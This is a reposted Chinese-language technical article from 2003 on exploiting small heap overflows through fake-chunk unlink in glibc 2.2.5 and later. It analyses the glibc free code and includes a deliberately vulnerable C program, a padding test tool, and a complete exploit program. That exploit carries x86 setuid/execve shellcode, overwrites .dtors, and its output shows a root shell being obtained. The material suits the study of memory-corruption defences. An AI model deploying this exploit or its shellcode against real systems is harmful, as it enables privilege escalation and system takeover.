一种小堆(heap)溢出的另类利用方法创建时间:2003-09-18 更新时间:2003-09-18 文章属性:转载 文章来源:http://www.cnhonker.com/index.php?module=articles&act=view&type=6&id=76 bkbll(bkbll@cnhonker.net 文章提交:watercloud (watercloud_at_xfocus.org) 文摘出处:http://www.cnhonker.com/index.php?module=articles&act=view&type=6&id=76 一种小堆(heap)溢出的另类利用方法 bkbll(bkbll@cnhonker.net) 2003-9-1 [1]. 什么是堆溢出 堆溢出(heap overflow) 类似stack overflow, 发生在BSS区. 关于heap overflow的文章外面有很多, 入门级别的w00w00的<w00w00 on Heap Overflows>, 这篇文章的中文版是由warning3 撰写, 文章地址是: http://www.w00w00.org/files/articles/heaptut-chinese.txt, 英文原版是: http://www.w00w00.org/files/articles/heaptut.txt, 其中还有warning3写的: <一种新的heap区溢出技术分析>, 文章在: http://www.nsfocus.net/index.php?act=sec_self&;do=view&doc_id=529&keyword=heap 本篇假设你理解了这两篇文章的意义. [2]. 本篇依赖的系统 本篇所有程序都在Rh linux 8.0 default install 平台上调试通过. 关于小堆的利用, 在glibc>=2.2.5的版本上才有意义, 在glibc 2.2.4(rh 7.2)上, 利用warning3的方法就完全可行, 所以本文假设你使用的平台glibc>=2.2.5. rh linux 8.0上的版本是glibc-2.2.93-5 . [3]. 和glibc<=2.2.5的区别 我们可以看看malloc的源代码. 低版本的分析可以参看warning3的文章, 高版本的源代码分析如下(int_free函数,因为函数比较长, 分解一下): void _int_free(mstate av, Void_t* mem) { if (mem != 0) { //如果mem!=NULL p = mem2chunk(mem); size = chunksize(p); check_inuse_chunk(av, p); if ((unsigned long)(size) <= (unsigned long)(av->max_fast) //这里,如果是小堆<64bytes #if TRIM_FASTBINS && (chunk_at_offset(p, size) != av->top) //并且这个块的下一块不是top块 #endif ) { set_fastchunks(av); fb = &(av->fastbins[fastbin_index(size)]); p->fd = *fb; *fb = p; } else if (!chunk_is_mmapped(p)) //如果这个块没有mmap位 { nextchunk = chunk_at_offset(p, size); nextsize = chunksize(nextchunk); assert(nextsize > 0); /* consolidate backward */ if (!prev_inuse(p)) //如果当前块的size部分标志着前一块未使用 { prevsize = p->prev_size; size += prevsize; p = chunk_at_offset(p, -((long) prevsize)); unlink(p, bck, fwd); //和前一块合并 } if (nextchunk != av->top) { /* get and clear inuse bit */ nextinuse = inuse_bit_at_offset(nextchunk, nextsize); //#define clear_inuse_bit_at_offset(p, s) (((mchunkptr)(((char*)(p)) + (s)))->size &= ~(PREV_INUSE)) /* consolidate forward */ if (!nextinuse) //如果下一个块没有使用, 则合并这个块 { unlink(nextchunk, bck, fwd); size += nextsize; } ………… } else //如果这个块后面紧挨着top块 { ……… } /* 注意这里, 如果合并后的大小>0xffff的话) */ if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) { if (have_fastchunks(av)) malloc_consolidate(av); ……. } } else { //如果是mmap的 …………. } } } 总结一下, 不同的地方有: 1. 当free的堆大小<64字节的时候, 会利用一种快速处理方法来处理. 2. 当合并后的size 大于0xffff的时候, 还有另外一个过程 , 这个过程如果你用伪造的chunk去处理的话, 很难保证不出错, 所以合并后的size要小于0xffff. 3. 块的大小必须要是8的倍数. 1和2 的比较过程都是用(unsigned long)类型比较, 所以在这里, 负数可以逃避1的规则限制, 而2里面就不行了, 如果size是一个负数, 会判断失败, 这样会跳转到一个复杂的计算过程, 所以在这里size一定不能是负数. [4]. 一个有漏洞的程序: /* just for fun */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> main(int argc,char **argv) { char *p1; char *p2; if(argc<2) { printf("Usage:%s <string>\n",argv[0]); exit(0); } if(strlen(argv[1])>40-1) { printf("ERROR:too long\n"); exit(0); } p1=(char *)malloc(20); p2=(char *)malloc(40); memset(p1,0,20); memset(p2,0,40); strcpy(p2,argv[1]); strcpy(p1,p2); printf("[+] input:%s\n",p1); memset(p2,0,40); free(p1); free(p2); exit(0); } [5]. 利用方法思考 初看起来和以前的heap overflow利用方法一样, 伪造chunk2和chunk3就可以写出exp的, 但因为第一个块是小块, 所以利用方法又有所不一样. 从内存结构来看, 我们可以覆盖的有: p2的prev_size和p2的size两个地方. 恰好这两个地方是控制p2的前一个块和后一个块的关键数据, 所以基本上我们可以伪造出前一个块和后一个块, 只要控制好inuse位, 我们就可以利用unlik操作写任意四个字节的数据到任意地方. 这里需要注意的是size必须要是一个正数, 而且这个数值必须小与0xffff. 这里我们有两种选择(为了描述方便, 我们把p2前一个块称做p1,后面的一个块称做p3, p3的下一块称作p4) 1. 利用伪造的p1,进行unlink操作. 只需要让p2的prev_inuse位清零 2. 利用伪造p3进行unlink操作, 因为后面有判断p3是否使用, 所以还需要伪造p4. 如果是要利用伪造p3进行unlink操作的话, 因为要考虑到size>0, 这里要考虑两种情况(利用strcpy,所以数据里面不能有0x00): 1. p2的size>0 因为p2本身缘故, 这个里面可以含有0x00. 这样p3就只能在p2后面了, 但看程序里面,p2后面的数据基本上全为0 , p3的fd和bk数据无法填充.所以不大可能. 2. p2的size<0 这样要求p3的size>0而且0xffff>(p3->size+p2->size)>0. 并且通过p3->size伪造的p4要满足我们的要求, 最重要的是p3->size四个字节的内存块里面不能有0x00.好像在内存中还找不出这样的一个位置来放我们的p3,如果你有更合适的办法, 请和交流. 从上面的分析可以看出, 利用伪造的p3块进行unlink操作难度系数太大了. 我们看看利用伪造的p1可不可行. 因为p1的地址是这样计算的:p1 addr=p2 addr – p2->prev_size, 而p2后面的内存基本上全为0 ,所以这里的prev_size必须要为一个正数, 但是又因为我们要覆盖到p2的size,所以prev_size内存块不能有0x00数据, 这里的p2->prev_size就只能是一个非常大的正数. 初看上去是不可行的, 但联想到我们的堆栈数据是0xbffff开头的, 如果将这个地址看成是一个有符号的数话,恰好是一个负数, 从前面的源代码上分析可以看出,size的加法全是有符号的操作, 所以我们可不可以将p1结构放到我们的堆栈里面呢? 这样我们可以通过这个非常大的正数将P1放到堆栈里面. P1确定好了, 为了保证0xffff>(p2->size+p1->size)>0, 而且又要求我们可以控制p3, 我们又需要精心构造一个p2->size,而且这个数据还需要设置p1的non-use位. 看上去是不是不可能的? 让我们看一看一个精彩的数学变换. 假设我们p2地址是p2addr,p1地址是p1addr,p1的大小是p1size,p2的大小是p2size,p3的地址是p3addr, p1size+p2size=offset,这个offset符合大于0和小于0xffff的规定. 那么这里有几个等式: p2addr-p1size=p1addr ------------① p2addr+p2size=p3addr ------------② p1size+p2size=offset ------------③ ②-①得: p2size+p1size=p3addr-p1addr 代入③得: offset=p3addr-p1addr,也即: p3addr=p1addr+offset. 我们的p1放在堆栈, 只要我们加上一点点的offset就可以得到我们的p3, 那么p4也可以顺利伪造出来了. 现在摆在面前的问题就只有一个: p3addr-p2addr也就是p2size必须要设置non-map和non-use位. 而且p2size要为8的倍数, 这样看来, p2size最后一个数据必须为8. 这个时候又有一个问题出来了, 我们该怎么构造这些数据以确保p3的结构里面符合要求而p3的地址和p2地址之差最后一位要为8? 这个数据该如何被确保存在? 经过思考, 我们可以想像出我们的p1和p3数据是这样的: |AAAA|AAAA| FD | BK |AAA.AAAAA|AAAA| P3SIZE|…. p1 p3 因为我们不用关心p1的prev_size以及p1的size, 而我们只需要关心p4的size的inuse是否为0, 这样,我们将p3->size设置成0xfffffff8(-8), 这样p4=p3+p3->size=p3-8, 这样只要保证*(char *)(p3-1)的数据最后一位为1就可以了. 填充的A就可以满足要求. 在P1和P3的数据后面我们可以跟上我们的shellcode,这样构造后的数据应该是这样的: | 被替换的地址 | 替换的地址 | xxxxxxxxxxxA|AAAA| -8 | shellcode | p1+8 p1+12 p3 我们回到刚才的问题, 怎么保证p3的地址满足要求. 我们可以这样考虑, 内存中存放多次的xxxA|AAAA| -8 | 这样的结构, 其中XXXA|AAAA长度我们需要验算一下. 我们的目标是, 经过有限次的16位数据循环, 我们总可以找到符合要求的xxxxA|AAAA|-8|这样满足要求的结构. 我们写个小程序验算一下: [netconf@linux1 challenge]$ cat test1.c /* test for 32 bits value */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define SIZE 200 #define PAD 5 #define FG 'A' #define ADDR 0xfffffff8 void foo(int offset,char *buffer) { int i,found=0; for(i=offset;i<strlen(buffer);i+=16) { if((buffer[i]==FG) && (buffer[i+1]==FG) && (buffer[i+2]==FG) && (buffer[i+3]==FG) && (*(unsigned int *)(buffer+i+4)==ADDR)) { printf("[+] found.i:%3d,cont:%c%c%c%c ADDR:%p\n",i,buffer[i],buffer[i+1],buffer[i+2],buffer[i+3],*(unsigned int *)(buffer+i+4)); found=1; continue; } } if(found==0) printf("[-] not found\n"); } main(int argc,char **argv) { char buffer[SIZE]; int i,j; int pd=PAD; if(argc>1) pd=atoi(argv[1]); memset(buffer,0,SIZE); for(i=0;i<SIZE-1;i+=pd+4) { memset(buffer+i,FG,pd); *(unsigned int *)(buffer+i+pd)=ADDR; } printf("[+] PAD=%d\n\n",pd); for(j=0;j<pd;j++) { printf("[+] Offset:%d\n",j); foo(j,buffer); } } [netconf@linux1 challenge]$ 我们分别验算一下从1-9符合要求的PAD是多少: [netconf@linux1 challenge]$ gcc -o test1 test1.c [netconf@linux1 challenge]$ ./test1 1 [+] PAD=1 [+] Offset:0 [-] not found [netconf@linux1 challenge]$ ./test1 2 [+] PAD=2 [+] Offset:0 [-] not found [+] Offset:1 [-] not found [netconf@linux1 challenge]$ ./test1 3 [+] PAD=3 [+] Offset:0 [-] not found [+] Offset:1 [-] not found [+] Offset:2 [-] not found [netconf@linux1 challenge]$ ./test1 4 [+] PAD=4 [+] Offset:0 [+] found.i: 0,cont:AAAA ADDR:0xfffffff8 [+] found.i: 16,cont:AAAA ADDR:0xfffffff8 [+] found.i: 32,cont:AAAA ADDR:0xfffffff8 [+] found.i: 48,cont:AAAA ADDR:0xfffffff8 [+] found.i: 64,cont:AAAA ADDR:0xfffffff8 [+] found.i: 80,cont:AAAA ADDR:0xfffffff8 [+] found.i: 96,cont:AAAA ADDR:0xfffffff8 [+] found.i:112,cont:AAAA ADDR:0xfffffff8 [+] found.i:128,cont:AAAA ADDR:0xfffffff8 [+] found.i:144,cont:AAAA ADDR:0xfffffff8 [+] found.i:160,cont:AAAA ADDR:0xfffffff8 [+] found.i:176,cont:AAAA ADDR:0xfffffff8 [+] found.i:192,cont:AAAA ADDR:0xfffffff8 [+] Offset:1 [-] not found [+] Offset:2 [-] not found [+] Offset:3 [-] not found [netconf@linux1 challenge]$ ./test1 5 [+] PAD=5 [+] Offset:0 [+] found.i: 64,cont:AAAA ADDR:0xfffffff8 [+] Offset:1 [+] found.i: 1,cont:AAAA ADDR:0xfffffff8 [+] found.i:145,cont:AAAA ADDR:0xfffffff8 [+] Offset:2 [+] found.i: 82,cont:AAAA ADDR:0xfffffff8 [+] Offset:3 [+] found.i: 19,cont:AAAA ADDR:0xfffffff8 [+] found.i:163,cont:AAAA ADDR:0xfffffff8 [+] Offset:4 [+] found.i:100,cont:AAAA ADDR:0xfffffff8 [netconf@linux1 challenge]$ ./test1 6 [+] PAD=6 [+] Offset:0 [+] found.i: 32,cont:AAAA ADDR:0xfffffff8 [+] found.i:112,cont:AAAA ADDR:0xfffffff8 [+] found.i:192,cont:AAAA ADDR:0xfffffff8 [+] Offset:1 [-] not found [+] Offset:2 [+] found.i: 2,cont:AAAA ADDR:0xfffffff8 [+] found.i: 82,cont:AAAA ADDR:0xfffffff8 [+] found.i:162,cont:AAAA ADDR:0xfffffff8 [+] Offset:3 [-] not found [+] Offset:4 [+] found.i: 52,cont:AAAA ADDR:0xfffffff8 [+] found.i:132,cont:AAAA ADDR:0xfffffff8 [+] Offset:5 [-] not found [netconf@linux1 challenge]$ ./test1 7 [+] PAD=7 [+] Offset:0 [+] found.i: 80,cont:AAAA ADDR:0xfffffff8 [+] Offset:1 [+] found.i:113,cont:AAAA ADDR:0xfffffff8 [+] Offset:2 [+] found.i:146,cont:AAAA ADDR:0xfffffff8 [+] Offset:3 [+] found.i: 3,cont:AAAA ADDR:0xfffffff8 [+] found.i:179,cont:AAAA ADDR:0xfffffff8 [+] Offset:4 [+] found.i: 36,cont:AAAA ADDR:0xfffffff8 [+] Offset:5 [+] found.i: 69,cont:AAAA ADDR:0xfffffff8 [+] Offset:6 [+] found.i:102,cont:AAAA ADDR:0xfffffff8 [netconf@linux1 challenge]$ ./test1 8 [+] PAD=8 [+] Offset:0 [+] found.i: 16,cont:AAAA ADDR:0xfffffff8 [+] found.i: 64,cont:AAAA ADDR:0xfffffff8 [+] found.i:112,cont:AAAA ADDR:0xfffffff8 [+] found.i:160,cont:AAAA ADDR:0xfffffff8 [+] Offset:1 [-] not found [+] Offset:2 [-] not found [+] Offset:3 [-] not found [+] Offset:4 [+] found.i: 4,cont:AAAA ADDR:0xfffffff8 [+] found.i: 52,cont:AAAA ADDR:0xfffffff8 [+] found.i:100,cont:AAAA ADDR:0xfffffff8 [+] found.i:148,cont:AAAA ADDR:0xfffffff8 [+] found.i:196,cont:AAAA ADDR:0xfffffff8 [+] Offset:5 [-] not found [+] Offset:6 [-] not found [+] Offset:7 [-] not found [netconf@linux1 challenge]$ ./test1 9 [+] PAD=9 [+] Offset:0 [+] found.i: 96,cont:AAAA ADDR:0xfffffff8 [+] Offset:1 [+] found.i:161,cont:AAAA ADDR:0xfffffff8 [+] Offset:2 [+] found.i: 18,cont:AAAA ADDR:0xfffffff8 [+] Offset:3 [+] found.i: 83,cont:AAAA ADDR:0xfffffff8 [+] Offset:4 [+] found.i:148,cont:AAAA ADDR:0xfffffff8 [+] Offset:5 [+] found.i: 5,cont:AAAA ADDR:0xfffffff8 [+] Offset:6 [+] found.i: 70,cont:AAAA ADDR:0xfffffff8 [+] Offset:7 [+] found.i:135,cont:AAAA ADDR:0xfffffff8 [+] Offset:8 [+] found.i:200,cont:AAAA ADDR:0xfffffff8 [netconf@linux1 challenge]$ 从上面的计算可以看出, 无论buffer开始地址多少, 当PAD为5,7,9的时候, 经过有限次列举总可以找到这样一个满足条件的位置. 我们取最小的数据5来构造我们的p3. [6]. 我们的exp 这样我们就可以写出exploit了: [netconf@linux1 challenge]$ cat exp4.c /* exp4 */ #include <stdlib.h> #include <stdio.h> #include <unistd.h> #define SIZE 20 #define FILL 200 /* 我们准备填充多少个p3结构来满足要求 */ #define PAD 5 #define want_write_to_addr 0x080496dc+4-3*4 /*.dtors地址*/ #define P2ADDR 0x08049738 /* p2的地址(chunk地址) */ #define shell_addr 0xbfffffa7 /* shellcode地址 */ #define P3ADDR 0xbfffff60 /* p2->next的地址*/ #define P1ADDR (unsigned long)(shell_addr-(FILL/(PAD+4))*(PAD+4)-0x08+1) /* p2->prev chunk的地址*/ #define VULN "./vul2" char shellcode[] = "\xeb\x0b\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" "\x31\xc0\x50\x50\xb0\xb5\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; main(int argc,char *argv[]) { int i,size=SIZE,size2,length; char *env[2],envbuf[400],buffer[100]; unsigned long p1size,p2size,p1addr; memset(buffer,0,100); if(argc>1) size=atoi(argv[1]); length=(int)(size+4)/8; if(length*8 == (size+4))length--; length*=8; for(i=0;i<length;i++) buffer[i]='A'; size2=P3ADDR-P1ADDR; p1size=size2-(P3ADDR-P2ADDR); p2size=P3ADDR-P2ADDR; printf("p2size+p1size:%p+%p=%#x\n",p2size,p1size,p2size+p1size); printf("p1addr:%p,p2addr:%p,p3addr=%p\n",P1ADDR,P2ADDR,P3ADDR); *(unsigned long *)(buffer+i)=p1size; i+=4; *(unsigned long *)(buffer+i)=p2size; i+=4; memset(envbuf,0,400); strcpy(envbuf,"STR="); i=strlen(envbuf); //构造p1和p3 *(unsigned long *)(envbuf+i)=want_write_to_addr; *(unsigned long *)(envbuf+i+4)=shell_addr; i+=8; for(i;i<200;i+=9) { memset(envbuf+i,'A',PAD); *(unsigned long *)(envbuf+i+PAD)=0xfffffff8; } memcpy(envbuf+i,shellcode,strlen(shellcode)); env[0]=envbuf; env[1]=NULL; execle(VULN,VULN,buffer,NULL,env); } 试一下: [netconf@linux1 challenge]$ ./exp4 p2size+p1size:0xb7fb6828+0x4804985e=0x86 p1addr:0xbffffeda,p2addr:0x8049738,p3addr=0xbfffff60 [+] input:AAAAAAAAAAAAAAAA^楬(h sh-2.05b# id uid=0(root) gid=500(netconf) groups=500(netconf) sh-2.05b# [7]. 参考文章: 1. warning3: <一种新的heap区溢出技术分析> |
